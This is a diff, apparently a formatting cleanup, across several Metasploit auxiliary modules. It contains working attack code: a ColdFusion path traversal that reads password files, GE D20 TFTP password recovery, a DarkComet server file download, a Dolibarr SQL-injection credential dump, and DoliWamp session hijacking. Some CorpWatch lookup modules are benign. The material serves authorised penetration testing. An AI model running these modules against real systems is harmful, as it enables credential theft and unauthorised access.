    end

-    if(title.downcase == 'coldfusionadministrator')
+    if (title.downcase == 'coldfusionadministrator')
      out << " (you have administrator access)"
    end

    out << " (#{os})"
    file = ''
    trav = ''
-    if(os =~ /Windows/ )
+    if (os =~ /Windows/)
      trav = '..\..\..\..\..\..\..\..\..\..'
      file = (out =~ /ColdFusion 9/) ? '\ColdFusion9\lib\password.properties' : '\ColdFusion10\CFusion\lib\password.properties'
    else
@@ -96,13 +103,13 @@ class MetasploitModule < Msf::Auxiliary
      file = (out =~ /ColdFusion 9/) ? '/opt/coldfusion9/lib/password.properties' : '/opt/coldfusion10/cfusion/lib/password.properties'
    end

-    if(response.body =~ /Adobe/ and response.body =~ /ColdFusion/ and file == '')
+    if (response.body =~ /Adobe/ and response.body =~ /ColdFusion/ and file == '')
      print_error("#{peer} Fingerprint failed...aborting")
      print_status("response: #{response.body}")
-      return nil,nil
+      return nil, nil
    end

-    return out,"#{trav}#{file}"
+    return out, "#{trav}#{file}"
  end

  def check
@@ -117,26 +124,26 @@ class MetasploitModule < Msf::Auxiliary
    vuln = false
    url = '/CFIDE/adminapi/customtags/l10n.cfm'
    res = send_request_cgi({
+      'uri' => url,
+      'method' => 'GET',
+      'Connection' => "keep-alive",
+      'Accept-Encoding' => "zip,deflate",
+    })
+
+    if (res != nil)
+      # can't stack b/c res.code won't exist if res is nil
+      vuln = true if (res.code == 500 and res.body =~ /attributes\.id was not provided/)
+    end
+
+    if (vuln)
+      url = '/CFIDE/administrator/mail/download.cfm'
+      res = send_request_cgi({
        'uri' => url,
        'method' => 'GET',
        'Connection' => "keep-alive",
        'Accept-Encoding' => "zip,deflate",
-        })
-
-    if(res != nil)
-    # can't stack b/c res.code won't exist if res is nil
-      vuln = true if(res.code == 500 and res.body =~ /attributes\.id was not provided/)
-    end
-
-    if(vuln)
-      url = '/CFIDE/administrator/mail/download.cfm'
-      res = send_request_cgi({
-          'uri' => url,
-          'method' => 'GET',
-          'Connection' => "keep-alive",
-          'Accept-Encoding' => "zip,deflate",
-          })
-      if(res != nil)
+      })
+      if (res != nil)
        vuln = false if (res.code != 200)
      end
    end
@@ -144,18 +151,17 @@ class MetasploitModule < Msf::Auxiliary
    return vuln
  end

-
  def run
    filename = ""

    url = '/CFIDE/administrator/index.cfm'
    # print_status("Getting index...")
    res = send_request_cgi({
-        'uri' => url,
-        'method' => 'GET',
-        'Connection' => "keep-alive",
-        'Accept-Encoding' => "zip,deflate",
-        })
+      'uri' => url,
+      'method' => 'GET',
+      'Connection' => "keep-alive",
+      'Accept-Encoding' => "zip,deflate",
+    })
    # print_status("Got back: #{res.inspect}")
    return if not res
    return if not res.body or not res.code
@@ -164,31 +170,31 @@ class MetasploitModule < Msf::Auxiliary
    out, filename = fingerprint(res)
    print_status("#{peer} #{out}") if out

-    if(out =~ /Not Vulnerable/)
+    if (out =~ /Not Vulnerable/)
      print_status("#{peer} isn't vulnerable to this attack")
      return
    end

-    if(not check_cf)
+    if (not check_cf)
      print_status("#{peer} can't be exploited (either files missing or permissions block access)")
      return
    end

    res = send_request_cgi({
-      'method'   => 'GET',
-      'uri'      => normalize_uri(target_uri.path, 'CFIDE', 'adminapi', 'customtags', 'l10n.cfm'),
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'CFIDE', 'adminapi', 'customtags', 'l10n.cfm'),
      'encode_params' => false,
      'encode' => false,
      'vars_get' => {
-        'attributes.id'            => 'it',
-        'attributes.file'          => '../../administrator/mail/download.cfm',
-        'filename'                 => filename,
-        'attributes.locale'        => 'it',
-        'attributes.var'           => 'it',
-        'attributes.jscript'       => 'false',
-        'attributes.type'          => 'text/html',
-        'attributes.charset'       => 'UTF-8',
-        'thisTag.executionmode'    => 'end',
+        'attributes.id' => 'it',
+        'attributes.file' => '../../administrator/mail/download.cfm',
+        'filename' => filename,
+        'attributes.locale' => 'it',
+        'attributes.var' => 'it',
+        'attributes.jscript' => 'false',
+        'attributes.type' => 'text/html',
+        'attributes.charset' => 'UTF-8',
+        'thisTag.executionmode' => 'end',
        'thisTag.generatedContent' => 'htp'
      }
    })
@@ -198,9 +204,9 @@ class MetasploitModule < Msf::Auxiliary
      return
    end

-    rdspass   = res.body.scan(/^rdspassword=(.+)/).flatten[0] || ''
-    password  = res.body.scan(/^password=(.+)/).flatten[0]    || ''
-    encrypted = res.body.scan(/^encrypted=(.+)/).flatten[0]   || ''
+    rdspass = res.body.scan(/^rdspassword=(.+)/).flatten[0] || ''
+    password = res.body.scan(/^password=(.+)/).flatten[0] || ''
+    encrypted = res.body.scan(/^encrypted=(.+)/).flatten[0] || ''

    if rdspass.empty? and password.empty?
      # No pass collected, no point to store anything
@@ -9,33 +9,41 @@ class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'CorpWatch Company ID Information Search',
-      'Description'    => %q{
-        This module interfaces with the CorpWatch API to get publicly available
-        info for a given CorpWatch ID of the company.  If you don't know the
-        CorpWatch ID, please use the corpwatch_lookup_name module first.
-      },
-      'Author'         => [ 'Brandon Perry <bperry.volatile[at]gmail.com>' ],
-      'References'     =>
-        [
+    super(
+      update_info(
+        info,
+        'Name' => 'CorpWatch Company ID Information Search',
+        'Description' => %q{
+          This module interfaces with the CorpWatch API to get publicly available
+          info for a given CorpWatch ID of the company.  If you don't know the
+          CorpWatch ID, please use the corpwatch_lookup_name module first.
+        },
+        'Author' => [ 'Brandon Perry <bperry.volatile[at]gmail.com>' ],
+        'References' => [
          [ 'URL', 'http://api.corpwatch.org/' ]
-        ]
-    ))
+        ],
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )

    deregister_http_client_options

    register_options(
      [
        OptString.new('CW_ID', [ true, "The CorpWatch ID of the company", ""]),
-        OptInt.new('YEAR', [ false, "Year to look up", Time.now.year-1]),
+        OptInt.new('YEAR', [ false, "Year to look up", Time.now.year - 1]),
        OptBool.new('GET_LOCATIONS', [ false, "Get locations for company", true]),
        OptBool.new('GET_NAMES', [ false, "Get all registered names ofr the company", true]),
        OptBool.new('GET_FILINGS', [ false, "Get all filings", false ]),
        OptBool.new('GET_CHILDREN', [false, "Get children companies", true]),
        OptInt.new('CHILD_LIMIT', [false, "Set limit to how many children we can get", 5]),
        OptBool.new('GET_HISTORY', [false, "Get company history", false])
-      ])
+      ]
+    )
  end

  def rhost_corpwatch
@@ -47,17 +55,16 @@ class MetasploitModule < Msf::Auxiliary
  end

  def run
-
    loot = ""
    uri = "/"
    uri << (datastore['YEAR']).to_s if datastore['YEAR'].to_s != ""
    uri << ("/companies/" + datastore['CW_ID'])

    res = send_request_cgi({
-      'rhost'    => rhost_corpwatch,
-      'rport'    => rport_corpwatch,
-      'uri'      => uri + ".xml",
-      'method'   => 'GET'
+      'rhost' => rhost_corpwatch,
+      'rport' => rport_corpwatch,
+      'uri' => uri + ".xml",
+      'method' => 'GET'
    }, 25)

    if res == nil
@@ -116,13 +123,13 @@ class MetasploitModule < Msf::Auxiliary
      loot << ("\nSector: " + (sector = grab_text(e, "sector_name")))
      loot << ("\nSource: " + (source = grab_text(e, "source_type")))
      loot << ("\nAddress: " + (address = grab_text(e, "raw_address")))
-      loot << ("\nCountry: " + ( country = grab_text(e, "country_code")))
+      loot << ("\nCountry: " + (country = grab_text(e, "country_code")))
      loot << ("\nSub-Division: " + (subdiv = grab_text(e, "subdiv_code")))
      loot << ("\nTop Parent CW_ID: " + (top_parent = grab_text(e, "top_parent_id")))
      loot << ("\nNumber of parents: " + (num_parents = grab_text(e, "num_parents")))
      loot << ("\nNumber of children: " + (num_children = grab_text(e, "num_children")))
      loot << ("\nMax searchable year: " + (max_year = grab_text(e, "max_year")))
-      loot << ("\nMinimum searchable year: "+ (min_year = grab_text(e, "min_year")))
+      loot << ("\nMinimum searchable year: " + (min_year = grab_text(e, "min_year")))
      loot << "\n\n\n"

      print_status("Basic Information\n--------------------")
@@ -152,12 +159,13 @@ class MetasploitModule < Msf::Auxiliary
    if datastore['GET_LOCATIONS']

      res = send_request_cgi(
-      {
-        'rhost'   => rhost_corpwatch,
-        'rport'   => rport_corpwatch,
-        'uri'     => uri + "/locations.xml",
-        'method'  => 'GET'
-      }, 25)
+        {
+          'rhost' => rhost_corpwatch,
+          'rport' => rport_corpwatch,
+          'uri' => uri + "/locations.xml",
+          'method' => 'GET'
+        }, 25
+      )

      if res == nil
        print_error("Server down or bad response")
@@ -190,9 +198,9 @@ class MetasploitModule < Msf::Auxiliary
        results.elements.each { |e|
          loot << ("CorpWatch ID: " + (cwid = grab_text(e, "cw_id")))
          loot << ("\nCountry code: " + (country_code = grab_text(e, "country_code"))
-          loot << ("\nSubdivision code: " + (subdiv_code = grab_text(e, "subdiv_code")))
-          loot << ("\nType: " + (type = grab_text(e, "type")))
-          loot << ("\nFull address: " + full_address = grab_text(e, "raw_address")))
+                   loot << ("\nSubdivision code: " + (subdiv_code = grab_text(e, "subdiv_code")))
+                   loot << ("\nType: " + (type = grab_text(e, "type")))
+                   loot << ("\nFull address: " + full_address = grab_text(e, "raw_address")))
          loot << ("\nStreet 1: " + (street1 = grab_text(e, "street_1")))
          loot << ("\nStreet 2: " + (street2 = grab_text(e, "street_2")))
          loot << ("\nCity: " + (city = grab_text(e, "city")))
@@ -224,12 +232,13 @@ class MetasploitModule < Msf::Auxiliary
    if datastore['GET_NAMES']

      res = send_request_cgi(
-      {
-        'rhost'   => rhost_corpwatch,
-        'rport'   => rport_corpwatch,
-        'uri'     => uri + "/names.xml",
-        'method'  => 'GET'
-      }, 25)
+        {
+          'rhost' => rhost_corpwatch,
+          'rport' => rport_corpwatch,
+          'uri' => uri + "/names.xml",
+          'method' => 'GET'
+        }, 25
+      )

      if res == nil
        print_error("Server down or bad response")
@@ -286,12 +295,13 @@ class MetasploitModule < Msf::Auxiliary
    if datastore['GET_FILINGS']

      res = send_request_cgi(
-      {
-        'rhost'   => rhost_corpwatch,
-        'rport'   => rport_corpwatch,
-        'uri'     => uri + "/filings.xml",
-        'method'  => 'GET'
-      }, 25)
+        {
+          'rhost' => rhost_corpwatch,
+          'rport' => rport_corpwatch,
+          'uri' => uri + "/filings.xml",
+          'method' => 'GET'
+        }, 25
+      )

      if res == nil
        print_error("Server down or response broken")
@@ -366,12 +376,13 @@ class MetasploitModule < Msf::Auxiliary
      end

      res = send_request_cgi(
-      {
-        'rhost'   => rhost_corpwatch,
-        'rport'   => rport_corpwatch,
-        'uri'      => child_uri,
-        'method'   => 'GET'
-      }, 25)
+        {
+          'rhost' => rhost_corpwatch,
+          'rport' => rport_corpwatch,
+          'uri' => child_uri,
+          'method' => 'GET'
+        }, 25
+      )

      if res == nil
        print_error("Server down or bad response")
@@ -448,10 +459,10 @@ class MetasploitModule < Msf::Auxiliary
    if datastore['GET_HISTORY']

      res = send_request_cgi({
-        'rhost'   => rhost_corpwatch,
-        'rport'   => rport_corpwatch,
-        'uri'     => uri + "/history.xml",
-        'method'  => 'GET'
+        'rhost' => rhost_corpwatch,
+        'rport' => rport_corpwatch,
+        'uri' => uri + "/history.xml",
+        'method' => 'GET'
      }, 25)

      if res == nil
@@ -524,7 +535,7 @@ class MetasploitModule < Msf::Auxiliary
      end
    end

-    p = store_loot("corpwatch_api.#{datastore['CW_ID']}_info","text/plain",nil,loot,"company_#{datastore['CW_ID']}.txt","#{datastore["CW_ID"]} Specific Information")
+    p = store_loot("corpwatch_api.#{datastore['CW_ID']}_info", "text/plain", nil, loot, "company_#{datastore['CW_ID']}.txt", "#{datastore["CW_ID"]} Specific Information")

    print_line()
    print_status("Saved in: #{p}")
@@ -532,7 +543,7 @@ class MetasploitModule < Msf::Auxiliary

  def grab_text(e, name)
    (e.get_elements(name) && e.get_elements(name)[0] &&
-    e.get_elements(name)[0].get_text ) ?
+    e.get_elements(name)[0].get_text) ?
    e.get_elements(name)[0].get_text.to_s : ""
  end
 end
@@ -10,30 +10,38 @@ class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'CorpWatch Company Name Information Search',
-      'Description'    => %q{
+    super(
+      update_info(
+        info,
+        'Name' => 'CorpWatch Company Name Information Search',
+        'Description' => %q{
          This module interfaces with the CorpWatch API to get publicly available
-        info for a given company name.  Please note that by using CorpWatch API, you
-        acknowledge the limitations of the data CorpWatch provides, and should always
-        verify the information with the official SEC filings before taking any action.
-      },
-      'Author'         => [ 'Brandon Perry <bperry.volatile[at]gmail.com>' ],
-      'References'     =>
-        [
+          info for a given company name.  Please note that by using CorpWatch API, you
+          acknowledge the limitations of the data CorpWatch provides, and should always
+          verify the information with the official SEC filings before taking any action.
+        },
+        'Author' => [ 'Brandon Perry <bperry.volatile[at]gmail.com>' ],
+        'References' => [
          [ 'URL', 'http://api.corpwatch.org/' ]
-        ]
-    ))
+        ],
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )

    deregister_http_client_options

    register_options(
      [
        OptString.new('COMPANY_NAME', [ true, "Search for companies with this name", ""]),
-        OptInt.new('YEAR', [ false, "Year to look up", Time.now.year-1]),
+        OptInt.new('YEAR', [ false, "Year to look up", Time.now.year - 1]),
        OptString.new('LIMIT', [ true, "Limit the number of results returned", "5"]),
        OptString.new('CORPWATCH_APIKEY', [ false, "Use this API key when getting the data", ""]),
-      ])
+      ]
+    )
  end

  def rhost_corpwatch
@@ -45,24 +53,24 @@ class MetasploitModule < Msf::Auxiliary
  end

  def run
-
    uri = "/"
    uri << (datastore['YEAR'].to_s + "/") if datastore['YEAR'].to_s != ""
    uri << "companies.xml"

    res = send_request_cgi(
-    {
-      'rhost'    => rhost_corpwatch,
-      'rport'    => rport_corpwatch,
-      'uri'      => uri,
-      'method'   => 'GET',
-      'vars_get' =>
      {
-        'company_name' => datastore['COMPANY_NAME'],
-        'limit'        => datastore['LIMIT'],
-        'key'          => datastore['CORPWATCH_APIKEY']
-      }
-    }, 25)
+        'rhost' => rhost_corpwatch,
+        'rport' => rport_corpwatch,
+        'uri' => uri,
+        'method' => 'GET',
+        'vars_get' =>
+        {
+          'company_name' => datastore['COMPANY_NAME'],
+          'limit' => datastore['LIMIT'],
+          'key' => datastore['CORPWATCH_APIKEY']
+        }
+      }, 25
+    )

    if not res
      print_error("Server down, bad response")
@@ -126,7 +134,7 @@ class MetasploitModule < Msf::Auxiliary

  def grab_text(e, name)
    (e.get_elements(name) && e.get_elements(name)[0] &&
-    e.get_elements(name)[0].get_text ) ?
-    e.get_elements(name)[0].get_text.to_s  : ""
+    e.get_elements(name)[0].get_text) ?
+    e.get_elements(name)[0].get_text.to_s : ""
  end
 end
@@ -8,7 +8,6 @@
 # parses the usernames and passwords from it.
 ##

-
 class MetasploitModule < Msf::Auxiliary
  include Rex::Ui::Text
  include Rex::Proto::TFTP
@@ -16,28 +15,36 @@ class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report

  def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'General Electric D20 Password Recovery',
-      'Description'    => %q{
-        The General Electric D20ME and possibly other units (D200?) feature
-        TFTP readable configurations with plaintext passwords.  This module
-        retrieves the username, password, and authentication level list.
-      },
-      'Author'         => [ 'K. Reid Wightman <wightman[at]digitalbond.com>' ],
-      'License'        => MSF_LICENSE,
-      'References'     =>
-        [
+    super(
+      update_info(
+        info,
+        'Name' => 'General Electric D20 Password Recovery',
+        'Description' => %q{
+          The General Electric D20ME and possibly other units (D200?) feature
+          TFTP readable configurations with plaintext passwords.  This module
+          retrieves the username, password, and authentication level list.
+        },
+        'Author' => [ 'K. Reid Wightman <wightman[at]digitalbond.com>' ],
+        'License' => MSF_LICENSE,
+        'References' => [
          ['CVE', '2012-6663'],
        ],
-      'DisclosureDate' => '2012-01-19'
-      ))
+        'DisclosureDate' => '2012-01-19',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )

    register_options(
      [
        Opt::RPORT(69),
        Opt::RHOST('192.168.255.1'),
        OptString.new('REMOTE_CONFIG_NAME', [true, "The remote filename used to retrieve the configuration", "NVRAM\\D20.zlb"])
-      ])
+      ]
+    )
  end

  def setup
@@ -51,16 +58,16 @@ class MetasploitModule < Msf::Auxiliary
  def cleanup
    if @tftp_client and @tftp_client.respond_to? :complete
      while not @tftp_client.complete
-        select(nil,nil,nil,1)
+        select(nil, nil, nil, 1)
        vprint_status "Cleaning up the TFTP client ports and threads."
        @tftp_client.stop
      end
    end
  end

-  def rtarget(ip=nil)
+  def rtarget(ip = nil)
    if (ip or rhost) and rport
-      [(ip || rhost),rport].map {|x| x.to_s}.join(":") << " "
+      [(ip || rhost), rport].map { |x| x.to_s }.join(":") << " "
    elsif (ip or rhost)
      rhost
    else
@@ -72,12 +79,12 @@ class MetasploitModule < Msf::Auxiliary
  def retrieve
    print_status("Retrieving file")
    @tftp_client = Rex::Proto::TFTP::Client.new(
-        "LocalHost" => @lhost,
-        "LocalPort" => @lport,
-        "PeerHost" => @rhost,
-        "PeerPort" => @rport,
-        "RemoteFile" => @rfile,
-        "Action" => :download
+      "LocalHost" => @lhost,
+      "LocalPort" => @lport,
+      "PeerHost" => @rhost,
+      "PeerPort" => @rport,
+      "RemoteFile" => @rfile,
+      "Action" => :download
    )
    @tftp_client.send_read_request { |msg| print_tftp_status(msg) }
    @tftp_client.threads do |thread|
@@ -95,6 +102,7 @@ class MetasploitModule < Msf::Auxiliary
  def makeword(bytestr)
    return bytestr.unpack("n")[0]
  end
+
  # builds abi
  def makelong(bytestr)
    return bytestr.unpack("N")[0]
@@ -160,6 +168,7 @@ class MetasploitModule < Msf::Auxiliary
    if name == myname
      return start
    end
+
    left = leftchild(f, start)
    right = rightchild(f, start)
    if name < myname
@@ -222,9 +231,10 @@ class MetasploitModule < Msf::Auxiliary
    logins = Rex::Text::Table.new(
      'Header' => "D20 usernames, passwords, and account levels\n(use for TELNET authentication)",
      'Indent' => 1,
-      'Columns' => ["Type", "User Name", "Password"])
+      'Columns' => ["Type", "User Name", "Password"]
+    )

-    0.upto(numentries -1).each do |i|
+    0.upto(numentries - 1).each do |i|
      f.seek(dstart + headerlen + i * entrylen)
      accounttype = makeword(f.read(2))
      f.seek(dstart + headerlen + i * entrylen + 2)
@@ -235,7 +245,7 @@ class MetasploitModule < Msf::Auxiliary
        print_error("Bad account parsing at #{dstart + headerlen + i * entrylen}")
        break
      end
-      logins <<  [accounttype,  accountname,  accountpass]
+      logins << [accounttype, accountname, accountpass]
      report_cred(
        ip: datastore['RHOST'],
        port: 23,
@@ -289,11 +299,11 @@ class MetasploitModule < Msf::Auxiliary
  def print_tftp_status(msg)
    case msg
    when /Aborting/, /errors.$/
-      print_error [rtarget,msg].join
+      print_error [rtarget, msg].join
    when /^WRQ accepted/, /^Sending/, /complete!$/
-      print_good [rtarget,msg].join
+      print_good [rtarget, msg].join
    else
-      vprint_status [rtarget,msg].join
+      vprint_status [rtarget, msg].join
    end
  end
 end
@@ -8,26 +8,32 @@ class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report

  def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'DarkComet Server Remote File Download Exploit',
-      'Description'    => %q{
-        This module exploits an arbitrary file download vulnerability in the DarkComet C&C server versions 3.2 and up.
-        The exploit does not need to know the password chosen for the bot/server communication.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
+    super(
+      update_info(
+        info,
+        'Name' => 'DarkComet Server Remote File Download Exploit',
+        'Description' => %q{
+          This module exploits an arbitrary file download vulnerability in the DarkComet C&C server versions 3.2 and up.
+          The exploit does not need to know the password chosen for the bot/server communication.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
          'Shawn Denbow & Jesse Hertz', # Vulnerability Discovery
          'Jos Wetzels' # Metasploit module, added support for versions < 5.1, removed need to know password via cryptographic attack
        ],
-      'References'     =>
-        [
+        'References' => [
          [ 'URL', 'https://www.nccgroup.com/globalassets/our-research/us/whitepapers/PEST-CONTROL.pdf' ],
          [ 'URL', 'http://samvartaka.github.io/exploitation/2016/06/03/dead-rats-exploiting-malware' ]
        ],
-      'DisclosureDate' => '2012-10-08',
-      'Platform'       => 'win'
-    ))
+        'DisclosureDate' => '2012-10-08',
+        'Platform' => 'win',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )

    register_options(
      [
@@ -41,7 +47,8 @@ class MetasploitModule < Msf::Auxiliary
        OptBool.new('STORE_LOOT', [false, 'Store file in loot (will simply output file to console if set to false).', true]),
        OptInt.new('BRUTETIMEOUT', [false, 'Timeout (in seconds) for bruteforce attempts', 1])

-      ])
+      ]
+    )
  end

  # Functions for XORing two strings, deriving keystream using known plaintext and applying keystream to produce ciphertext
@@ -7,39 +7,48 @@ class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Dolibarr Gather Credentials via SQL Injection',
-      'Description'    => %q{
-         This module enables an authenticated user to collect the usernames and
-         encrypted passwords of other users in the Dolibarr ERP/CRM via SQL
-         injection.
-      },
-      'Author'         => [
-                            'Issam Rabhi',  # PoC
-                            'Kevin Locati', # PoC
-                            'Shelby Pace',  # Metasploit Module
-                          ],
-      'License'        => MSF_LICENSE,
-      'References'     => [
-                            [ 'CVE', '2018-10094' ],
-                            [ 'EDB', '44805']
-                          ],
-      'DisclosureDate' => '2018-05-30'
-    ))
+    super(
+      update_info(
+        info,
+        'Name' => 'Dolibarr Gather Credentials via SQL Injection',
+        'Description' => %q{
+          This module enables an authenticated user to collect the usernames and
+          encrypted passwords of other users in the Dolibarr ERP/CRM via SQL
+          injection.
+        },
+        'Author' => [
+          'Issam Rabhi', # PoC
+          'Kevin Locati', # PoC
+          'Shelby Pace',  # Metasploit Module
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          [ 'CVE', '2018-10094' ],
+          [ 'EDB', '44805']
+        ],
+        'DisclosureDate' => '2018-05-30',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )

    register_options(
      [
        OptString.new('TARGETURI', [ true, 'The base path to Dolibarr', '/' ]),
        OptString.new('USERNAME', [ true, 'The username for authenticating to Dolibarr', 'admin' ]),
        OptString.new('PASSWORD', [ true, 'The password for authenticating to Dolibarr', 'admin' ])
-      ])
+      ]
+    )
  end

  def check_availability
    login_page = target_uri.path.end_with?('index.php') ? normalize_uri(target_uri.path) : normalize_uri(target_uri.path, '/index.php')
    res = send_request_cgi(
-      'method'  =>  'GET',
-      'uri'     =>  normalize_uri(login_page)
+      'method' => 'GET',
+      'uri' => normalize_uri(login_page)
    )

    return false unless res && res.body.include?('Dolibarr')
@@ -55,15 +64,15 @@ class MetasploitModule < Msf::Auxiliary
    print_status("Logging in...")

    login_res = send_request_cgi(
-       'method'  =>  'POST',
-       'uri'     =>  login_uri,
-       'cookie'  =>  cookies,
-       'vars_post' =>  {
-         'username'  =>  datastore['USERNAME'],
-         'password'  =>  datastore['PASSWORD'],
-         'loginfunction' =>  'loginfunction'
-       }
-     )
+      'method' => 'POST',
+      'uri' => login_uri,
+      'cookie' => cookies,
+      'vars_post' => {
+        'username' => datastore['USERNAME'],
+        'password' => datastore['PASSWORD'],
+        'loginfunction' => 'loginfunction'
+      }
+    )

    unless login_res && login_res.body.include?('id="mainmenua_members"')
      fail_with(Failure::NoAccess, "Couldn't log into Dolibarr")
@@ -81,13 +90,13 @@ class MetasploitModule < Msf::Auxiliary
    inject_uri <<= cmd

    inject_res = send_request_cgi(
-      'method'  =>  'GET',
-      'uri'     => normalize_uri(inject_uri),
-      'cookie'  => cookies
+      'method' => 'GET',
+      'uri' => normalize_uri(inject_uri),
+      'cookie' => cookies
    )

    unless inject_res && inject_res.body.include?('id="searchFormList"')
-     fail_with(Failure::NotFound, "Failed to access page. The user may not have permissions.")
+      fail_with(Failure::NotFound, "Failed to access page. The user may not have permissions.")
    end

    print_good("Accessed credentials")
@@ -8,31 +8,39 @@ class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
-    super(update_info(
-      info,
-      'Name'           => "DoliWamp 'jqueryFileTree.php' Traversal Gather Credentials",
-      'Description'    => %q{
+    super(
+      update_info(
+        info,
+        'Name' => "DoliWamp 'jqueryFileTree.php' Traversal Gather Credentials",
+        'Description' => %q{
          This module will extract user credentials from DoliWamp - a WAMP
-        packaged installer distribution for Dolibarr ERP on Windows - versions
-        3.3.0 to 3.4.2 by hijacking a user's session. DoliWamp stores session
-        tokens in filenames in the 'tmp' directory. A directory traversal
-        vulnerability in 'jqueryFileTree.php' allows unauthenticated users
-        to retrieve session tokens by listing the contents of this directory.
-        Note: All tokens expire after 30 minutes of inactivity by default.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         => 'bcoles',
-      'References'     =>
-        [
+          packaged installer distribution for Dolibarr ERP on Windows - versions
+          3.3.0 to 3.4.2 by hijacking a user's session. DoliWamp stores session
+          tokens in filenames in the 'tmp' directory. A directory traversal
+          vulnerability in 'jqueryFileTree.php' allows unauthenticated users
+          to retrieve session tokens by listing the contents of this directory.
+          Note: All tokens expire after 30 minutes of inactivity by default.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => 'bcoles',
+        'References' => [
          ['URL', 'https://doliforge.org/tracker/?func=detail&aid=1212&group_id=144'],
          ['URL', 'https://github.com/Dolibarr/dolibarr/commit/8642e2027c840752c4357c4676af32fe342dc0cb']
        ],
-      'DisclosureDate' => '2014-01-12'))
+        'DisclosureDate' => '2014-01-12',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )
    register_options(
      [
-        OptString.new('TARGETURI',      [true, 'The path to Dolibarr', '/dolibarr/']),
+        OptString.new('TARGETURI', [true, 'The path to Dolibarr', '/dolibarr/']),
        OptString.new('TRAVERSAL_PATH', [true, 'The traversal path to the application tmp directory', '../../../../../../../../tmp/'])
-      ])
+      ]
+    )
  end

  #
@@ -42,11 +50,12 @@ class MetasploitModule < Msf::Auxiliary
    tokens = nil
    print_status("Finding session tokens...")
    res = send_request_cgi({
-      'method'    => 'POST',
-      'uri'       => normalize_uri(
+      'method' => 'POST',
+      'uri' => normalize_uri(
        target_uri.path,
-        'includes/jquery/plugins/jqueryFileTree/connectors/jqueryFileTree.php'),
-      'cookie'    => @cookie,
+        'includes/jquery/plugins/jqueryFileTree/connectors/jqueryFileTree.php'
+      ),
+      'cookie' => @cookie,
      'vars_post' => { 'dir' => datastore['TRAVERSAL_PATH'] }
    })
    if !res
@@ -69,21 +78,21 @@ class MetasploitModule < Msf::Auxiliary
  def get_user_info(user_id)
    vprint_status("Retrieving user's credentials")
    res = send_request_cgi({
-      'method'    => 'GET',
-      'uri'       => normalize_uri(target_uri.path, 'user/fiche.php'),
-      'cookie'    => @cookie,
-      'vars_get'  => Hash[{
-        'action'    => 'edit',
-        'id'        => "#{user_id}"
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'user/fiche.php'),
+      'cookie' => @cookie,
+      'vars_get' => Hash[{
+        'action' => 'edit',
+        'id' => "#{user_id}"
      }.to_a.shuffle]
    })
    if !res
      print_error("Connection failed")
    elsif res.body =~ /User card/
      record = [
-        res.body.scan(/name="login" value="([^"]+)"/             ).flatten.first,
-        res.body.scan(/name="password" value="([^"]+)"/          ).flatten.first,
-        res.body.scan(/name="superadmin" value="\d">(Yes|No)/    ).flatten.first,
+        res.body.scan(/name="login" value="([^"]+)"/).flatten.first,
+        res.body.scan(/name="password" value="([^"]+)"/).flatten.first,
+        res.body.scan(/name="superadmin" value="\d">(Yes|No)/).flatten.first,
        res.body.scan(/name="email" class="flat" value="([^"]+)"/).flatten.first
      ]
      unless record.empty?
@@ -100,8 +109,8 @@ class MetasploitModule < Msf::Auxiliary
  #
  def get_user_id
    res = send_request_cgi({
-      'uri'       => normalize_uri(target_uri.path, 'user/fiche.php'),
-      'cookie'    => @cookie
+      'uri' => normalize_uri(target_uri.path, 'user/fiche.php'),
+      'cookie' => @cookie
    })
    if !res
      print_error("Connection failed")
@@ -119,8 +128,8 @@ class MetasploitModule < Msf::Auxiliary
  #
  def create_cookie(token)
    res = send_request_cgi({
-      'uri'       => normalize_uri(target_uri.path, 'user/fiche.php'),
-      'cookie'    => "DOLSESSID_#{Rex::Text.rand_text_alphanumeric(10)}=#{token}"
+      'uri' => normalize_uri(target_uri.path, 'user/fiche.php'),
+      'cookie' => "DOLSESSID_#{Rex::Text.rand_text_alphanumeric(10)}=#{token}"
    })
    if !res
      print_error("Connection failed")
@@ -136,7 +145,7 @@ class MetasploitModule < Msf::Auxiliary
  # Stolen from modules/auxiliary/scanner/ftp/titanftp_xcrc_traversal.rb
  #
  def progress(current, total)
-    done    = (current.to_f / total.to_f) * 100
+    done = (current.to_f / total.to_f) * 100
    percent = "%3.2f%%" % done.to_f
    vprint_status("Trying to hijack a session - " +
